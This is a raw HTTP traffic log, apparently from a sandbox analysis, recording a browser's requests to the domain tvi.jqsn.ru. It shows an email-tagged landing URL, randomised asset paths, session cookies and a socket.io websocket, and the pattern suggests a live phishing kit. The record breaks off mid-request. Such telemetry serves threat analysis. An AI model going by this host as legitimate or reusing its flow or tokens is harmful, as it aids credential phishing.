      Source: global trafficHTTP traffic detected: GET /i8jbs1sy/?GXnobody@nobody.org HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://tvi.jqsn.ru/i8jbs1sy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6Im9xTElBcXVSWk45aFJ5dU4zTDE2RFE9PSIsInZhbHVlIjoicXNuUVo2TXAzTExadUMwUFR4bTkxVmM5eERBTDdnZlJrOVFTREVjMUpQblpOZCtiRTkxS0tQZDFvaVJTZlpPZ0NqYjg1ZWl3YjNBTXFjcUxyQnM4T1BPLzhXRk1vWEVVNnljZlp2TG9OTDA3a3pueWtScnRZK0xqVmw2U3FLNzQiLCJtYWMiOiI4YWYzNDU0MjEzMmY5ZGEwMzI5OGQ3M2NmMDgwOTgyMGQxNTgzZWVhMTNlZmUxYzc4NTEyNjY4NTk2NzcyN2RjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ii9waGpNb082TGdrOXRaQTZnNWUzU1E9PSIsInZhbHVlIjoiT3B0VDV3bVRSZkRRaFVsNXB3VmFYY25nYW5RcGRKc0srdzZQWXZxRzJhWGJueXBGdkl4UnpiUXFWTmlXaXNCelJoR3ROSXhpa0xjY1FyWEFyZXVHeU9JVFltdENrdkRIZk8vcU1zSzNmMGo0OC81T0Jsck1HOTZuemlwREVKeEsiLCJtYWMiOiJkNTNjY2ZlNmY0ZWEwZGJhNTBmNjYwZTM4NjQyMGJlYzI5YzRmOGMzYTI5YmZiYTI3NDBkMmQ3ZGJhMWQzOTVhIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJ HTTP/1.1Host: tvi.jqsn.ruConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Referer: https://tvi.jqsn.ru/i8jbs1sy/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6IkM5bWdRZ05QK1ZmdG55eUZmcEJ0WUE9PSIsInZhbHVlIjoiZ2Q5ellVcVRUQXlqajJhS21HMWlML2FndmhNb3FMZ0FCZm0zQllPa2R3eUNFaVBWcUNEeXQzL0xwMmYyWEhtZFE2Unp1YmNtZXZmNzlnWERUbmMwQUgyUllDSnJGZjJNYVNPS1VPTEM2NjFSSzFOU3R4ZFh6eFcvUmdjQXFmcEkiLCJtYWMiOiIxOWE5YWRlYjEwYjY5ZmMxMWQzYjQ5YTYyY2NmMDdkY2EyMmQ2N2VjNjQzYjc5MDkyZWZkNjY1YmQ5ZDAzM2ZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IndwQ1FxVmY1U1ZpYk5EcE1LWUMzS1E9PSIsInZhbHVlIjoick1wcy9oL2Nya2JmYzkzTDRBTFlKbTJ4bVlNaHc3cE5aV0JIL0FwK054RXduWXhVOXllcllzYTlmMTZtekJ6Z0tNeXB6dHMxMWZUZ21qMHcvMW40OGNJbERZSlFuaDZiZENCSkRHZEh3bWZaU1ZIMkpacjJPSVlic2w0eDZKclAiLCJtYWMiOiI1MDczOWNiNzNjYmEyZmUzNGFlNTdjMTAzZDM2ZWNjYjVhYTkwMzA3ZTZmOWY2ODFhZTkxMTQ0NTMwNmQ1NDM4IiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /56A5wX26vkiBXPzcdL7A5K8920 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /xygiTdFpqHPcd30 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /pqVb1I3EaC9yzhgYJIUPwx31 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /yz4ne6w1ln1Sx0R456oW1wuxFqr49 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /56VQuccXKefp045CypTXYc2st60 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /23IwflouldIy5KfULABLPv90jLWsGG8fJ1vw67 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /recaptcha/api.js HTTP/1.1Host: www.google.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQi5ys0BCIrTzQEY9snNARjrjaUXSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /89T0AFtET47Mtjcd1jdhpDg4Knmkab73 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /cdMVTgR3ifU0J478w5vPGB5lhjWmn93 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://tvi.jqsn.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /web8socket/socket.io/?type=User&appnum=1&EIO=4&transport=websocket HTTP/1.1Host: tvi.jqsn.ruConnection: UpgradePragma: no-cacheCache-Control: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Upgrade: websocketOrigin: https://tvi.jqsn.ruSec-WebSocket-Version: 13Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3DSec-WebSocket-Key: kqkZncZX0mBMIcU1CMdOgg==Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
      Source: global trafficHTTP traffic detected: GET /34s6xy28ZSROS4cpdHadCJue12ijCcyRgKMuW0KrD89102 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://tvi.jqsn.ru/nDIJVwPQzlTONBckRKmhMOAIuXaMZQBVVYSCTIBPNAVUAAUZWUGNT?HWUVZKZECYDXYLXPZPHZXAZTOMDckwJKeIDDEVATGXWAIPEERDDAJSYPSJMBSJQAOPJAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: XSRF-TOKEN=eyJpdiI6ImJPUnlPaVpTVForUjBMMGVxWS9rUHc9PSIsInZhbHVlIjoiTjN1cWdhd0NoYWlaSTRPTnZqTU1hUXNEcXdGbisvcEVUbFcySGtsdzcvcGJnMlNLcmorTGk0V05uQmRqcUdsOHQwWlNXYjJOVGRmUDFWWTV0NVJlMDAydnUvTmFpS285R3ZZTmJPTFM5dVJHYlpaOC8zSUNRSEZGd1lDTlpBT3MiLCJtYWMiOiJlMTIwZjRlMTY2YTNhMmM1ODFlMjJlOGVkMWQxNmRhZDkxYmFhYTExZjczNzllOTljM2QwN2VjOGU5YmM1N2VjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6IngvMStrOFpMeCt1dGpDcXFJV0JNTHc9PSIsInZhbHVlIjoiYWpZSUhBek5qQmI3UC8zVjN0NXhBc1J3a3BBNmJUWGFOMU5EWFYweWVSaHhkdHZlWUU0SHFKWTBwdDNvV2hXMCtab2o5QzlnWFFFdWozcXJXWmpEdGlUZnlGWkpidlRNYXRiL0xwekJsM2lFT2RWOHl4T1pVZzJ6cXFVcnd2T0kiLCJtYWMiOiI1ZWFmZDRhZTkwZGZhYjRkZDcxODFhMDkyZWVkODVlYTQ5ZDcwMDQ4Y2IwNTBiYTFhMmU5Yjk1ZTY2Njg3OGJmIiwidGFnIjoiIn0%3D
      Source: global trafficHTTP traffic detected: GET /mnfqLXRfQb3h8jiqIHrJocr2SvHxvsqgDjQlqSFokmcLijea1DfEXdLqvO8CSbTWvd9juv212 HTTP/1.1Host: tvi.jqsn.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: 